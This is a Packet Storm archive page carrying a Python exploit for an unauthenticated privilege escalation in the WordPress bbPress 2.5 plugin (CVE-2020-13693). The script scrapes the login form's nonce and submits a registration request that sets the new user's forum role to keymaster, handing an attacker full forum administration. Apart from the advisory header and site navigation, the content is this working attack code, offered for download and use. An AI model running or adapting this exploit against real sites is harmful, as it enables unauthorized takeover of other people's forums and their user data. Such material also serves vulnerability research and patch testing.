what you don't know can hurt you

WordPress BBPress 2.5 Privilege Escalation

WordPress BBPress 2.5 Privilege Escalation
Posted May 30, 2020
Authored by Raphael Karger

WordPress BBPress plugin version 2.5 suffers from an unauthenticated privilege escalation vulnerability.

tags | exploit
advisories | CVE-2020-13693
MD5 | a6217fd54141ba4dd36c902308da0bac

WordPress BBPress 2.5 Privilege Escalation

Change Mirror Download
# Exploit Title: Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation
# Date: 2020-05-29
# Exploit Author: Raphael Karger
# Software Link: https://codex.bbpress.org/releases/
# Version: BBPress < 2.5
# CVE: CVE-2020-13693

import argparse
import requests
import bs4
import urllib3
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)

useragent = {"User-Agent" : "This is a real browser i swear"}

def grab_nonce_login_page(url):
try:
login_page_request = requests.get(url, verify=False, timeout=10, headers=useragent)
soup = bs4.BeautifulSoup(login_page_request.text, "lxml")
action = soup.find("form", class_="bbp-login-form")
wp_login_page = action.get("action")
wp_nonce = action.find("input", id="_wpnonce").get("value")
return (wp_nonce, wp_login_page)
except Exception as nonce_error:
print("[-] Nonce Error: '{}'".format(nonce_error))
return False

def exploit(url, username, password, email):
info = grab_nonce_login_page(url)
if info:
nonce = info[0]
login_page = info[1]
try:
return requests.post(login_page, data={
"user_login" : username,
"user_pass" : password,
"user_email" : email,
"user-submit" : "",
"user-cookie" : "1",
"_wpnonce" : nonce,
"bbp-forums-role" : "bbp_keymaster"
}, allow_redirects=False, verify=False, timeout=10, headers=useragent)
except Exception as e:
print("[-] Error Making Signup Post Request: '{}'".format(e))
return False

if __name__ == "__main__":
exit("asdasd")
parser = argparse.ArgumentParser()
parser.add_argument("-n", "--username", dest="username", help="Username of Newly Created Keymaster", default="raphaelrocks")
parser.add_argument("-p", "--password", dest="password", help="Password of Newly Created Keymaster", default="raphael123")
parser.add_argument("-e", "--email", dest="email", help="Email of Newly Created Keymaster", default="test@example.com")
parser.add_argument("-u", "--url", dest="url", help="URL of Page With Exposed Register Page.", required=True)
args = parser.parse_args()
site_exploit = exploit(args.url, args.username, args.password, args.email)
if site_exploit and site_exploit.status_code == 302:
exit("[+] Exploit Successful, Use Username: '{}' and Password: '{}'".format(args.username, args.password))
print("[-] Exploit Failed")
Login or Register to add favorites

File Archive:

November 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    2 Files
  • 2
    Nov 2nd
    9 Files
  • 3
    Nov 3rd
    15 Files
  • 4
    Nov 4th
    90 Files
  • 5
    Nov 5th
    22 Files
  • 6
    Nov 6th
    16 Files
  • 7
    Nov 7th
    1 Files
  • 8
    Nov 8th
    1 Files
  • 9
    Nov 9th
    40 Files
  • 10
    Nov 10th
    27 Files
  • 11
    Nov 11th
    28 Files
  • 12
    Nov 12th
    13 Files
  • 13
    Nov 13th
    18 Files
  • 14
    Nov 14th
    2 Files
  • 15
    Nov 15th
    2 Files
  • 16
    Nov 16th
    29 Files
  • 17
    Nov 17th
    15 Files
  • 18
    Nov 18th
    15 Files
  • 19
    Nov 19th
    21 Files
  • 20
    Nov 20th
    16 Files
  • 21
    Nov 21st
    1 Files
  • 22
    Nov 22nd
    0 Files
  • 23
    Nov 23rd
    19 Files
  • 24
    Nov 24th
    32 Files
  • 25
    Nov 25th
    7 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    0 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close